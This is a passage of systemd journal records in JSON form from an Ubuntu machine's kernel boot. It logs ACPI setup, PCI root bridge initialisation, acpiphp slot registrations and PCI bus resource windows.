"_SOURCE_MONOTONIC_TIMESTAMP" : "188219", "MESSAGE" : "ACPI: Enabled 2 GPEs in block 00 to 0F" } 
{ "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cb;b=e2b08827b5804427b422c10c84f1567e;m=558a7f;t=5bd16dd1909e6;x=614576160dde48d8", "__REALTIME_TIMESTAMP" : "1615280779889126", "__MONOTONIC_TIMESTAMP" : "5606015", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "194082", "MESSAGE" : "ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cc;b=e2b08827b5804427b422c10c84f1567e;m=558b38;t=5bd16dd190aa0;x=ec4fc644a915985a", "__REALTIME_TIMESTAMP" : "1615280779889312", "__MONOTONIC_TIMESTAMP" : "5606200", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "196011", "MESSAGE" : "acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cd;b=e2b08827b5804427b422c10c84f1567e;m=558bc0;t=5bd16dd190b27;x=86ceb47bb867c586", "__REALTIME_TIMESTAMP" : "1615280779889447", "__MONOTONIC_TIMESTAMP" : "5606336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "199398", "MESSAGE" : "acpi PNP0A03:00: _OSC failed (AE_NOT_FOUND); disabling ASPM" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ce;b=e2b08827b5804427b422c10c84f1567e;m=558c63;t=5bd16dd190bca;x=8006e9f582bdcfc5", "__REALTIME_TIMESTAMP" : "1615280779889610", "__MONOTONIC_TIMESTAMP" : "5606499", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_KERNEL_SUBSYSTEM" : "acpi", "_KERNEL_DEVICE" : "+acpi:PNP0A03:00", "_UDEV_SYSNAME" : "PNP0A03:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "200016", "PRIORITY" : "4", "MESSAGE" : "acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=cf;b=e2b08827b5804427b422c10c84f1567e;m=558c81;t=5bd16dd190be8;x=e4630d4082cec94f", "__REALTIME_TIMESTAMP" : "1615280779889640", "__MONOTONIC_TIMESTAMP" : "5606529", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "204440", "MESSAGE" : "acpiphp: Slot [3] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d0;b=e2b08827b5804427b422c10c84f1567e;m=558c8c;t=5bd16dd190bf3;x=74d43fcd51b8a32a", "__REALTIME_TIMESTAMP" : "1615280779889651", "__MONOTONIC_TIMESTAMP" : "5606540", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "206960", "MESSAGE" : "acpiphp: Slot [4] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d1;b=e2b08827b5804427b422c10c84f1567e;m=558c9a;t=5bd16dd190c01;x=c9ee9d4ba2345155", "__REALTIME_TIMESTAMP" : "1615280779889665", "__MONOTONIC_TIMESTAMP" : "5606554", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "208060", "MESSAGE" : "acpiphp: Slot [5] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d2;b=e2b08827b5804427b422c10c84f1567e;m=558ca4;t=5bd16dd190c0c;x=290a75fec63580", "__REALTIME_TIMESTAMP" : "1615280779889676", "__MONOTONIC_TIMESTAMP" : "5606564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "210320", "MESSAGE" : "acpiphp: Slot [6] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d3;b=e2b08827b5804427b422c10c84f1567e;m=558caf;t=5bd16dd190c16;x=b757a1b1a9814433", "__REALTIME_TIMESTAMP" : "1615280779889686", "__MONOTONIC_TIMESTAMP" : "5606575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "212068", "MESSAGE" : "acpiphp: Slot [7] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d4;b=e2b08827b5804427b422c10c84f1567e;m=558cb9;t=5bd16dd190c20;x=371cfb0a26cb473a", "__REALTIME_TIMESTAMP" : "1615280779889696", "__MONOTONIC_TIMESTAMP" : "5606585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "214241", "MESSAGE" : "acpiphp: Slot [8] registered" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d5;b=e2b08827b5804427b422c10c84f1567e;m=558cc3;t=5bd16dd190c2a;x=d7cd86ed04f23905", "__REALTIME_TIMESTAMP" : "1615280779889706", "__MONOTONIC_TIMESTAMP" : "5606595", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "216075", "MESSAGE" : "acpiphp: Slot [9] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d6;b=e2b08827b5804427b422c10c84f1567e;m=558ccd;t=5bd16dd190c34;x=109ca8f7a7b8f084", "__REALTIME_TIMESTAMP" : "1615280779889716", "__MONOTONIC_TIMESTAMP" : "5606605", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "218093", "MESSAGE" : "acpiphp: Slot [10] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d7;b=e2b08827b5804427b422c10c84f1567e;m=558cd7;t=5bd16dd190c3f;x=254b2a4852bf3ab8", "__REALTIME_TIMESTAMP" : "1615280779889727", "__MONOTONIC_TIMESTAMP" : "5606615", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "220054", "MESSAGE" : "acpiphp: Slot [11] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d8;b=e2b08827b5804427b422c10c84f1567e;m=558ce5;t=5bd16dd190c4c;x=c2d4e9cbb43a1b58", "__REALTIME_TIMESTAMP" : "1615280779889740", "__MONOTONIC_TIMESTAMP" : "5606629", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
"ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "222142", "MESSAGE" : "acpiphp: Slot [12] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d9;b=e2b08827b5804427b422c10c84f1567e;m=558cef;t=5bd16dd190c57;x=edcbddafee92b0f", "__REALTIME_TIMESTAMP" : "1615280779889751", "__MONOTONIC_TIMESTAMP" : "5606639", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "224055", "MESSAGE" : "acpiphp: Slot [13] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=da;b=e2b08827b5804427b422c10c84f1567e;m=558cf9;t=5bd16dd190c61;x=ff342f0e7778618d", "__REALTIME_TIMESTAMP" : "1615280779889761", "__MONOTONIC_TIMESTAMP" : "5606649", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "226203", "MESSAGE" : "acpiphp: Slot [14] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=db;b=e2b08827b5804427b422c10c84f1567e;m=558d06;t=5bd16dd190c6e;x=c01dbd6857ee3cbd", "__REALTIME_TIMESTAMP" : "1615280779889774", "__MONOTONIC_TIMESTAMP" : "5606662", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "228056", "MESSAGE" : "acpiphp: Slot [15] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dc;b=e2b08827b5804427b422c10c84f1567e;m=558d11;t=5bd16dd190c78;x=1cecf41a859e0d9a", "__REALTIME_TIMESTAMP" : "1615280779889784", "__MONOTONIC_TIMESTAMP" : "5606673", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : 
"kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "230194", "MESSAGE" : "acpiphp: Slot [16] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=dd;b=e2b08827b5804427b422c10c84f1567e;m=558d1b;t=5bd16dd190c83;x=6f4fd28d63c8a383", "__REALTIME_TIMESTAMP" : "1615280779889795", "__MONOTONIC_TIMESTAMP" : "5606683", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "232074", "MESSAGE" : "acpiphp: Slot [17] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=de;b=e2b08827b5804427b422c10c84f1567e;m=558d25;t=5bd16dd190c8d;x=92ce5d577915cc12", "__REALTIME_TIMESTAMP" : "1615280779889805", "__MONOTONIC_TIMESTAMP" : "5606693", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "234204", "MESSAGE" : "acpiphp: Slot [18] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=df;b=e2b08827b5804427b422c10c84f1567e;m=558d2f;t=5bd16dd190c97;x=eb1e4f71c91af795", "__REALTIME_TIMESTAMP" : "1615280779889815", "__MONOTONIC_TIMESTAMP" : "5606703", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "236052", "MESSAGE" : "acpiphp: Slot [19] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e0;b=e2b08827b5804427b422c10c84f1567e;m=558d3a;t=5bd16dd190ca1;x=acdf7eb7d06d831f", 
"__REALTIME_TIMESTAMP" : "1615280779889825", "__MONOTONIC_TIMESTAMP" : "5606714", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "238186", "MESSAGE" : "acpiphp: Slot [20] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e1;b=e2b08827b5804427b422c10c84f1567e;m=558d44;t=5bd16dd190cab;x=922cc8b31e4c0829", "__REALTIME_TIMESTAMP" : "1615280779889835", "__MONOTONIC_TIMESTAMP" : "5606724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "240052", "MESSAGE" : "acpiphp: Slot [21] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e2;b=e2b08827b5804427b422c10c84f1567e;m=558d4e;t=5bd16dd190cb5;x=32612c6d0dba1840", "__REALTIME_TIMESTAMP" : "1615280779889845", "__MONOTONIC_TIMESTAMP" : "5606734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "242203", "MESSAGE" : "acpiphp: Slot [22] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e3;b=e2b08827b5804427b422c10c84f1567e;m=558d6a;t=5bd16dd190cd2;x=aea19448686e6875", "__REALTIME_TIMESTAMP" : "1615280779889874", "__MONOTONIC_TIMESTAMP" : "5606762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "244053", "MESSAGE" : "acpiphp: Slot [23] registered" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e4;b=e2b08827b5804427b422c10c84f1567e;m=558d83;t=5bd16dd190ceb;x=b59ff18ba9e88ffb", "__REALTIME_TIMESTAMP" : "1615280779889899", "__MONOTONIC_TIMESTAMP" : "5606787", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "246254", "MESSAGE" : "acpiphp: Slot [24] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e5;b=e2b08827b5804427b422c10c84f1567e;m=558d8f;t=5bd16dd190cf7;x=b1df68348006767", "__REALTIME_TIMESTAMP" : "1615280779889911", "__MONOTONIC_TIMESTAMP" : "5606799", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "248053", "MESSAGE" : "acpiphp: Slot [25] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e6;b=e2b08827b5804427b422c10c84f1567e;m=558d9a;t=5bd16dd190d01;x=4dcb9e0ec273830f", "__REALTIME_TIMESTAMP" : "1615280779889921", "__MONOTONIC_TIMESTAMP" : "5606810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "250238", "MESSAGE" : "acpiphp: Slot [26] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e7;b=e2b08827b5804427b422c10c84f1567e;m=558dab;t=5bd16dd190d13;x=31ac93d807cba66f", "__REALTIME_TIMESTAMP" : "1615280779889939", "__MONOTONIC_TIMESTAMP" : "5606827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 
"_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "252055", "MESSAGE" : "acpiphp: Slot [27] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e8;b=e2b08827b5804427b422c10c84f1567e;m=558dbc;t=5bd16dd190d24;x=ad184afb6e01a9f4", "__REALTIME_TIMESTAMP" : "1615280779889956", "__MONOTONIC_TIMESTAMP" : "5606844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "254696", "MESSAGE" : "acpiphp: Slot [28] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e9;b=e2b08827b5804427b422c10c84f1567e;m=558dd7;t=5bd16dd190d3f;x=afe1777123395e10", "__REALTIME_TIMESTAMP" : "1615280779889983", "__MONOTONIC_TIMESTAMP" : "5606871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "256061", "MESSAGE" : "acpiphp: Slot [29] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ea;b=e2b08827b5804427b422c10c84f1567e;m=558de1;t=5bd16dd190d48;x=3f915f30eba4e271", "__REALTIME_TIMESTAMP" : "1615280779889992", "__MONOTONIC_TIMESTAMP" : "5606881", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "258131", "MESSAGE" : "acpiphp: Slot [30] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=eb;b=e2b08827b5804427b422c10c84f1567e;m=558dfa;t=5bd16dd190d62;x=25bff900685e8418", "__REALTIME_TIMESTAMP" : "1615280779890018", "__MONOTONIC_TIMESTAMP" : "5606906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 
"_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "260055", "MESSAGE" : "acpiphp: Slot [31] registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ec;b=e2b08827b5804427b422c10c84f1567e;m=558e04;t=5bd16dd190d6b;x=362eeb39cc63ada1", "__REALTIME_TIMESTAMP" : "1615280779890027", "__MONOTONIC_TIMESTAMP" : "5606916", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "262384", "MESSAGE" : "PCI host bridge to bus 0000:00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ed;b=e2b08827b5804427b422c10c84f1567e;m=558e88;t=5bd16dd190df0;x=d8bbcd0964c6b88c", "__REALTIME_TIMESTAMP" : "1615280779890160", "__MONOTONIC_TIMESTAMP" : "5607048", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "264008", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ee;b=e2b08827b5804427b422c10c84f1567e;m=558f03;t=5bd16dd190e6b;x=e61b00e29112adb0", "__REALTIME_TIMESTAMP" : "1615280779890283", "__MONOTONIC_TIMESTAMP" : "5607171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : 
"0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "267267", "MESSAGE" : "pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=ef;b=e2b08827b5804427b422c10c84f1567e;m=558f82;t=5bd16dd190eea;x=ac0fa8a1df325f3e", "__REALTIME_TIMESTAMP" : "1615280779890410", "__MONOTONIC_TIMESTAMP" : "5607298", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "268006", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f0;b=e2b08827b5804427b422c10c84f1567e;m=558feb;t=5bd16dd190f52;x=8a9860fa2fdb0675", "__REALTIME_TIMESTAMP" : "1615280779890514", "__MONOTONIC_TIMESTAMP" : "5607403", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "271763", "MESSAGE" : "pci_bus 0000:00: root bus resource [mem 0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f1;b=e2b08827b5804427b422c10c84f1567e;m=559089;t=5bd16dd190ff1;x=ca588a5d05c5e3a", "__REALTIME_TIMESTAMP" : "1615280779890673", "__MONOTONIC_TIMESTAMP" : "5607561", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", 
